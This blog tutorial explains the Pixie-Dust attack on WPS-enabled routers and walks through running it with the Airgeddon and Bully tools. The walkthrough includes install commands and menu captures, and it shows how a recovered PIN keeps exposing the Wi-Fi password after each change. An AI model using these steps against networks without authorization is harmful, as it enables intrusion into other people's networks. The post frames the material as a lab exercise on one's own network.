Pixie-Dust Wifi Attack: Theory & Practice

-
In the series of wifi hacking, I have already covered WPA handshake capture and social engineering. In this post I present to you yet another attack using a novel approach for gaining access to a network: it is based on the WPS protocol and is known as the Pixie-Dust attack. You will find a step-by-step guide after a short explanation of the theory behind the security flaw hereby discussed.

WPS: where does the flaw come from?

First, let's explore the main victim of our attack: the Wifi Protected Setup. Commonly known as WPS, this is a feature found in the vast majority of routers allowing users to access their network if they forget their password. WPS offers two ways of connection for the user: a physical button located on the back of the router, and an 8-digit PIN usually printed below it. Our attack is based on the latter: the infamous WPS PIN.
Circled in red: the WPS pin
In 2011, security researcher Stefan Viehbock found a vulnerability in all routers, allowing him to simply brute-force the machine with all possible combinations of the WPS PIN. He built a tool to automate the process and called it Reaver. Cracking the 8-digit PIN was faster than it should have been because the last digit was a checksum, meaning that the attacker only needed to guess the first seven digits, thus cutting the number of possible combinations to 10^7=10,000,000. Furthermore, the attacker was able to guess each half at a time due to the way the protocol works: when an enrollee (client) attempts a connection through a PIN, the registrar (AP) reports the validity of the first and second halves of the PIN separately. Since the first half of the PIN consists of four digits and the second has only three active ones (remember that the last digit is a checksum), we only need to try 10^4+10^3=11,000 combinations in order to recover the PIN. The CPUs at the time achieved this in a matter of a few seconds - less than 10 - which is catastrophic.

This vulnerability was quickly patched with obvious fixes: limiting the number of attempts and/or imposing a time delay in-between them. Therefore, the Reaver attack is now obsolete. But you know what they say about cyber security: it never stops evolving.

A new generation of WPS attack: Pixie-Dust

Fast-forward to 2014. A pentester named Dominique Bongard discovers what he calls the Pixie-Dust attack, suitable for the most common wireless chip makers like Ralink, Realtek, MediaTek and Broadcom.

Of course, we know that the WPS PIN is encrypted. For a strong encryption, random numbers are required, but in fact, a computer machine is strictly incapable of generating a truly random number. Instead, the machine starts with a "seed" that is processed through an algorithm and finally returns a pseudo-random number. This process involves a cryptographic "nonce" (short for "number used once"), which is by definition a pseudo-random number issued in an authentication protocol used only once as an initializing vector. In short, the Pixie-Dust attack focuses on the lack of randomization when generating the E-S1 and E-S2 secret nonces for the WPS PIN.

N.B. This diagram is a simplified version from one on Wikipedia.

In simpler terms, the attack works just because router manufacturers use known functions to produce random numbers, with trivial seed values such as zero or the timestamp of the WPS transaction.

But can we learn without practice? No. So let's demonstrate the attack.

Requirements

Nothing too different from the previous attacks I covered:
  • Raspberry Pi 3 or later running Kali Linux (tutorial here)
  • Monitor-mode & packet-injection capable Wifi card
  • Your own network to perform the test (you should have explicit authorization before proceeding, please read the disclaimer in the side menu of this website)
  • Laptop to control the Pi via VNC (tutorial here)

Prerequisite Tools

To demonstrate the Pixie-Dust exploit, we will use a wireless attack framework called Airgeddon, which provides the tools needed in a single suite. Downloading Airgeddon is simple: we first clone the Git repository, navigate to the new Airgeddon path, and install the suite by running the file airgeddon.sh as a bash script:

root@kali:~# git clone github.com/v1s1t0r1sh3r3/airgeddon.git
root@kali:~# cd airgeddon
root@kali:~# sudo bash ./airgeddon.sh

Upon launch, Airgeddon will automatically check for essential dependencies. If you have the full version of Kali Linux, they should all be installed. For this attack in particular, make sure you have Bully on your system. If not, or if you want to download any other dependencies, use the following command:

root@kali:~# apt-get install MISSING_PACKAGE  

Launching the attack

The first step is to select our wireless network adapter from the list that Airgeddon displays. In my case it's wlan1mon. Then we will select option 8 for a WPS attack:
Interface wlan1mon selected. Mode: Monitor. Supported bands: 2.4 GHz, 5 GHz.
Select an option from menu:
----------
1. Select another network interface
2. Put interface in monitor mode
3. Put interface in managed mode
----------
4. DoS attacks menu
5. Handshake tools menu
6. Offline WPA/WPA2 decrypt menu
7. Evil Twin attacks menu
8. WPS attacks menu
9. WEP attacks menu
----------
10. About & Credits
11. Options and language menu
12. Exit script
After putting our wireless interface into monitor mode, we're now ready to scan for nearby networks, so we'll chose option 4:
----------
4

***********Exploring for targets***********
Exploring for targets option chosen (monitor mode enabled)

Selected interface wlan1mon is in monitor mode. Exploration can be performed

Checking to solve possible "bad FCS" problem if exists. Parametrizing...
Done! Parameter set

Your wifi card supports the 5GHz band but your "wash" version included in reaver package
(v1.6.3) is not able to scan both bands at once. To use dual band scan feature you must 
have at least version v1.6.5 so you have to make a choice. Do you want to use the 5GHz 
band? (If you answer no ("n"), 2.4GHz band will be scanned) [y/N]
A new window showing all vulnerable networks in the vicinity will pop up. We will let the scan run for a few seconds, and as soon as we see our target we can close the window. We now load the wifi target data into the Bully module. To do se, we select our target from the networks list, then we choose the Bully Pixie-Dust attack (option 7).
Select target network:
1

***********WPS attacks menu***********
Interface wlan1mon selected. Mode: Monitor. Supported bands: 2.4GHz, 5GHz.
Selected WPS BSSID: xx
Selected WPS channel: 2
Selected WPS ESSID: xx
WPS locked network: No

Select an option from menu:
----------
1. Select another network interface
2. Put interface in monitor mode
3. Put interface in managed mode
4. Explore for targets (monitor mode needed)
----------(monitor mode needed for attacks)----------
5. (bully) Custom PIN association
6. (reaver) Custom PIN association
7. (bully) Pixie Dust attack
8. (reaver) Pixie Dust attack
9. (bully) Bruteforce PIN attack
10. (reaver) Bruteforce PIN attack
11. (bully) Known PINs database based attack
12. (reaver) Known PINs database based attack
----------
13. Offline PIN generation using algorithms and database
----------
The last value we need to input is the timeout (the time after which the system will declare a failure). I chose 120 seconds. As soon as Bully captures the data required to break the PIN, it will pass it to the Pixie-Dust program. The PIN and Wifi password will then appear at the bottom of the screen, thus giving us full access to the network and the router. Notice that if we take note of the WPS PIN, we can later use the "custom PIN association" module to retrieve the new password every time it is changed. This will work until the target disables WPS or acquires a new router, which emphasizes the severity of this security flaw: we are dealing here with the maximum level of threat given that the only solution to stop the attack is to change the hardware.

Comments

Post a Comment

Share your thoughts! Leave a comment here

Popular posts from this blog

Getting started in scripting

-
Image
Perhaps the most important skill a hacker should master is programming. This is what makes the true difference between "hackers" and "script kiddies". The latter lacks the knowledge to write his own script: he rather uses programs made by others to attack his target. In contrast, a worthy hacker builds his own program tailored to his needs in order to exploit a specific vulnerability. Does that mean that a hacker never uses material written by others? Of course not. As most of the exploits (i.e. scripts that exploit a flaw) written by/for the Linux community are open-source, hackers often reverse-engineer these programs to understand how they work and potentially modify them to suit their own needs. What's more, when building his own script, a hacker very often integrates some tool from a fellow hacker. This is precisely how malware evolves on a daily basis: a programmer uses his know-how to combine multiple exploits in an effective way. Writing your firs
Read more

How to capture a WPA handshake

-
Image
There are different methods for getting unauthorized access to a Wifi network. I will try to cover several ones, but in this post I will focus on capturing a WPA handshake for a subsequent dictionary or brute-force attack. Requirements Before getting started make sure you have the following: Raspberry Pi 3 running Kali Linux ( tutorial here ) Monitor-mode and Packet-injection capable wifi adapter PC Decent internet connection We'll be using the wifi adapter with the Raspberry Pi, controlling them with a PC via VNC ( tutorial here ). What is a WPA handshake? In simple words, a WPA handshake is used to authenticate a user with an AP (Access Point). To illustrate things, think of it as a literal handshake: if the client presents his hand but the AP doesn't, the handshake can't happen and authentication thus fails. Because the engineering behind a WPA handshake is not the main purpose of this guide, let's dive into our work. Discovering the target AP Th
Read more